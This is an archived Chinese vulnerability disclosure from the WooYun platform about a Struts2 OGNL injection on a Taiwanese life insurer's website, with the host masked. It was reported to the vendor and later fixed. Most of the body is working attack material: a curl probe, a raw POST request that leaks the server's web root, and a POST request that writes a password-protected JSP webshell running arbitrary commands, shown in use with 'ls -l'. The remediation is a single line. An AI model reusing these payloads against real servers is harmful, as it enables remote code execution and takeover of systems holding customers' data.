乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-15: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-14: 细节向实习白帽子公开 2016-01-27: 厂商已经修复漏洞并主动公开,细节向公众公开
台湾南山人寿官网命令执行可getshell
访问url:https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13,如图:
执行如下命令,看是否进行302跳转。
$ curl -i https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 -F "redirect:/xxoo=-1"HTTP/1.1 100 ContinueHTTP/1.1 302 FoundDate: Mon, 14 Dec 2015 14:16:38 GMTServer: IBM_HTTP_ServerX-Powered-By: Servlet/3.0Location: https://**.**.**.**/eServicePublic/xxooContent-Length: 0Content-Type: text/plainContent-Language: en-US
发现302跳转。抓包修改数据包的method为POST方式,并获取web应用部署的绝对路径见如下:
POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1Host: **.**.**.**Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=0000010JCkqr9Egyntbk-S5O7On:PLWS9_eServ; _ga=GA1.3.246686188.1450007096Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 258--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"-1--------------------------5423a63046c50524a84963968721
执行效果如下图:
接下来执行写入webshell命令(一句话木马)200081214.jsp:
POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1Host: **.**.**.**Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=0000010JCkqr9Egyntbk-S5O7On:PLWS9_eServ; _ga=GA1.3.246686188.1450007096Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721Content-Length: 659--------------------------5423a63046c50524a84963968721Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/opt/WebSphere/AppServer/profiles/eService/installedApps/WASCell/eServicePublicEAR.ear/eServicePublic.war/200081214.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"-1--------------------------5423a63046c50524a84963968721
执行效果如下:
访问刚刚上传后的webshell:https://**.**.**.**/eServicePublic/200081214.jsp?pwd=023&i=ls%20-l%20/opt/WebSphere/AppServer/profiles/eService/installedApps/WASCell/eServicePublicEAR.ear/eServicePublic.war/如下图:
升级Struts2版本到最新版
危害等级:高
漏洞Rank:18
确认时间:2015-12-15 23:52
感謝通報
2016-01-27:已修復